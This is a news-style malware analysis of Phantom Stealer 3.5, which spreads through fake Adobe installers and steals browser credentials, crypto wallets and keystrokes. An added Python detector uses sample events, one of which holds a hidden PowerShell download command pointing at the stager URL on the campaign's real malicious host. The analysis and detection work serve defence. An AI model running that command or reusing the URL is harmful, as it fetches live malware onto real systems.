A sophisticated new threat known as Phantom Stealer version 3.5 is actively targeting users worldwide, aiming to steal sensitive data. This malware is currently being distributed through deceptive installers disguised as legitimate Adobe software, making it a significant concern for cybersecurity professionals and everyday computer users alike. The primary objective of Phantom Stealer is to extract critical information such as passwords, browser cookies, credit card details, and cryptocurrency wallet data.
The campaign was first identified on October 29, 2025. Its attack vector begins with a fake Adobe 11.7.7 installer file. Investigations by K7 Security Labs revealed that this file is actually an obfuscated XML document with embedded JavaScript code. Upon execution, this code initiates a chain of malicious activities, including downloading a PowerShell script from a remote server, which lays the groundwork for deeper system compromise.
Phantom Stealer Employs Multi-Stage Infection and Evasion Tactics
Researchers at K7 Security Labs have detailed a sophisticated multi-stage infection mechanism employed by Phantom Stealer. The malware initiates its operation by downloading an obfuscated PowerShell script from “positivepay-messages.com/file/floor.ps1.” This script is designed to execute with hidden attributes, thereby bypassing some standard security policies.
The downloaded PowerShell script contains RC4-encrypted data. Once decrypted, this data contains instructions for loading a .NET assembly directly into the system’s memory. This assembly is crucial for the subsequent stages of the malware’s operation, enabling it to perform more advanced malicious actions without being easily detected.
Following the execution of the PowerShell script, the next critical phase involves the BLACKHAWK.dll injector. This component is responsible for process injection, where it inserts malicious code into a legitimate and trusted Windows utility, specifically Aspnetcompiler.exe. By embedding itself within a system process, Phantom Stealer can operate covertly, making it more difficult for endpoint security solutions to identify and flag its activities.
The malware employs a persistent monitoring strategy, checking every five seconds to ensure that Aspnetcompiler.exe remains active. This ongoing vigilance allows the stealer to maintain its presence and continue its data collection efforts without interruption, making it a persistent threat to infected systems.
Phantom Stealer utilizes a range of advanced evasion techniques to avoid detection and hinder analysis. The malware includes numerous anti-analysis checks designed to identify whether it is running within a virtual machine, a sandbox environment, or under monitoring tools. One such check matches the current username against a hardcoded list of 112 usernames known to be used by sandboxes.
Should the malware detect such an environment, it initiates a self-destruction sequence. This involves creating a batch file that forcefully terminates its own process, thereby preventing security researchers from examining its behavior or extracting its code for analysis. This proactive measure demonstrates the malware’s developers’ efforts to protect their creation from scrutiny.
A particularly noteworthy evasion technique employed by the stealer is the use of “Heaven’s Gate.” This is an advanced user-mode hook evasion technique that transitions a 32-bit process from 32-bit to 64-bit execution mode. This allows the malware to bypass 32-bit user-mode hooks, which security software often uses to monitor process behavior. By executing native x64 system calls directly, Phantom Stealer can access sensitive data without triggering the security mechanisms designed to intercept such actions.
Once successfully embedded, Phantom Stealer begins to exfiltrate a wide array of sensitive information. This includes credentials for popular web browsers such as Chrome and Edge, obtained by accessing and decrypting their encrypted databases with extracted encryption keys. Additionally, it targets cryptocurrency wallet credentials, Outlook email configurations, keylogged data from user keystrokes, and general system information. For enhanced surveillance, the malware also captures screenshots of the victim’s screen every 1000 milliseconds.
The exfiltration of this stolen data is facilitated through multiple communication channels. Phantom Stealer utilizes protocols like SMTP and FTP, as well as popular communication platforms such as Telegram and Discord. The collected data is meticulously organized, typically with computer names and timestamps, creating a structured repository of victim information that can then be exploited for various malicious purposes.
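The infection chain (hidden PowerShell stager, injection into Aspnetcompiler.exe) and the exfiltration channels described above can be turned into endpoint detection logic. The following is an added example, not code from the K7 Security Labs report: a small detector run over constructed Sysmon-style events. The event field names, the sample events, the URL scheme, and the Telegram hostname are assumptions; the stager path, the injection target, and the SMTP/FTP/Telegram/Discord channels come from the article.

```python
# Added example: flag Phantom-Stealer-like behaviour in constructed Sysmon-style events.
import re

STAGER_URL = "positivepay-messages.com/file/floor.ps1"   # from the article (scheme omitted)
INJECTION_TARGET = "aspnetcompiler.exe"                   # article's spelling, lower-cased
EXFIL_PORTS = {21, 25, 465, 587}                          # FTP and SMTP, channels named in the article
EXFIL_HOST_RE = re.compile(r"(telegram|discord)", re.I)   # chat-platform channels named in the article

def _base(path):
    """Lower-cased file name of a Windows image path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def detect(events):
    """Return (rule, detail) findings for the three stages the article describes."""
    findings = []
    for ev in events:
        kind = ev["event"]
        if kind == "process_create" and _base(ev["image"]) == "powershell.exe":
            cmd = ev.get("cmdline", "")
            hidden = re.search(r"-w(indowstyle)?\s+hidden", cmd, re.I)
            if hidden and STAGER_URL in cmd.lower():
                findings.append(("hidden_ps_stager", cmd))
        elif kind == "create_remote_thread" and _base(ev["target_image"]) == INJECTION_TARGET:
            # Aspnetcompiler.exe is a build tool; another process writing a thread into it is abnormal.
            findings.append(("inject_aspnetcompiler", _base(ev["source_image"])))
        elif kind == "network" and _base(ev["image"]) == INJECTION_TARGET:
            host, port = ev.get("dest_host", ""), ev.get("dest_port")
            if port in EXFIL_PORTS or EXFIL_HOST_RE.search(host):
                findings.append(("aspnetcompiler_exfil", f"{host}:{port}"))
    return findings

# Constructed sample events (assumed field layout, not a real capture).
SAMPLE_EVENTS = [
    {"event": "process_create",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell.exe -WindowStyle Hidden -c "iwr http://positivepay-messages.com/file/floor.ps1"'},
    {"event": "create_remote_thread",
     "source_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",  # host of the injector (assumed)
     "target_image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnetcompiler.exe"},
    {"event": "network", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\Aspnetcompiler.exe",
     "dest_host": "api.telegram.org", "dest_port": 443},                             # hostname assumed
    {"event": "network", "image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "dest_host": "example.org", "dest_port": 443},                                  # benign traffic
]

if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(rule, detail)
```

The benign Firefox connection produces no finding, which is the intended property: the rules key on the specific stager, the unusual injection target, and that target's egress, not on generic network activity.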
The ongoing evolution and sophistication of threats like Phantom Stealer underscore the need for robust cybersecurity measures. Organizations are advised to implement comprehensive email filtering solutions, maintain regular software updates to patch vulnerabilities, and deploy advanced endpoint protection technologies. Continuous vigilance and updated security practices are essential to defend against this growing and adaptable threat landscape.